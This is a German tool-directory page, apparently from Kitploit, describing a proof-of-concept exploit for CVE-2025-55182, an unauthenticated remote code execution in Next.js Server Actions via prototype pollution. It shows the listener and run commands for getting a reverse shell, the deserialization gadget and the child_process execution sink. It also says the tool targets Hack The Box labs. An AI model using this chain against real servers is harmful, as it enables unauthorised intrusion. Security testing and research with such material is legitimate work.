Skip to content
KitploitKITPLOIT
ToolsBlog
Einreichen
ToolsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

··Feeds·Kontakt·Datenschutz·© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
Tools/GitHubGitHub/uwugreed/cve-2025-55182-poc
SchwachstellenanalyseExploitationWebanwendungs-ExploitationPenetrationstestsRed TeamingPayload-Entwicklung
GitHubuwugreed/cve-2025-55182-poc

CVE-2025-55182-poc

Ich weiß, du bist wahrscheinlich wegen Hack the Box hier – falls ja, ja, dieses hier funktioniert tatsächlich.

Repository anzeigen
vor 7h 42mNoch nicht geprüft

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →
Teilen

CVE-2025-55182-poc

Ein Proof-of-Concept-Exploit (PoC) für CVE-2025-55182, der eine nicht authentifizierte Remote-Code-Execution-Schwachstelle (RCE) in Next.js Server Actions angreift.

Dieser Exploit missbraucht Prototype Pollution während der Deserialisierung von React-Server-Components- (RSC) Multipart-Payloads, um mithilfe eines asynchronen, nicht blockierenden Ausführungsablaufs bösartige Befehle in den Node.js-Prozess einzuschleusen.


Funktionen

  • Asynchrone Ausführung: Verwendet child_process.exec() anstelle von blockierenden execSync()-APIs, um Thread-Hänger auf Container-Knoten zu verhindern.
  • Robuste Multi-Shell-Zustellung: Nutzt eine POSIX-konforme FIFO-Pipe-Reverse-Shell-Zeichenkette für maximale Ausführungsstabilität in minimalistischen Linux-Container-Engines.
  • Keine externen Abhängigkeiten: Vollständig mit Pythons nativer requests-Bibliothek erstellt.

Verwendung

1. Richten Sie Ihren Listener ein

Öffnen Sie ein Terminal auf Ihrem angreifenden Host und starten Sie einen Netcat-Socket-Listener, um die eingehende Reverse-Verbindung zu empfangen:

root@kitploit:~
nc -lvnp 4444

2. Führen Sie das Skript aus

Geben Sie die Ziel-Basis-URL, Ihre lokale Host-Interface-IP und Ihren gewünschten Listener-Port an:

root@kitploit:~
python3 exploit.py <target_url> <your_ip> [your_port]

Beispiel:

root@kitploit:~
python3 exploit.py http://website.whatever:port x.x.x.x 4444

Technische Details

Das Skript sendet eine manipulierte rohe Multipart-Payload direkt an den Anwendungs-Routing-Endpunkt mit dem erforderlichen Next-Action-Routing-Header.

Durch die Nutzung von Objektkonstruktions-Signaturen über {"get":"$1:constructor:constructor"} verschmutzt die Deserialisierungs-Engine den nativen Objektbaum. Bei der Verarbeitung der begleitenden Parameter interpretiert sie den bösartig eingebetteten _response-Kontextblock als Befehls-Warteschlange, wodurch eine Codeausführung unter den Berechtigungen des laufenden Node-Server-Benutzerkontexts ermöglicht wird.

root@kitploit:~
// Zugrunde liegendes Vektorziel:
process.mainModule.require('child_process').exec('your_payload_here');

⚠️ Haftungsausschluss

Dieses Skript wurde ausschließlich für Bildungszwecke, autorisierte Sicherheitstests und das Erfassen verwundbarer Flags in Laboren wie Hack The Box erstellt. Der Autor ist nicht verantwortlich für Missbrauch, unbefugte Systemeindringlinge oder Schäden, die durch dieses Werkzeug verursacht werden.

Tool herunterladen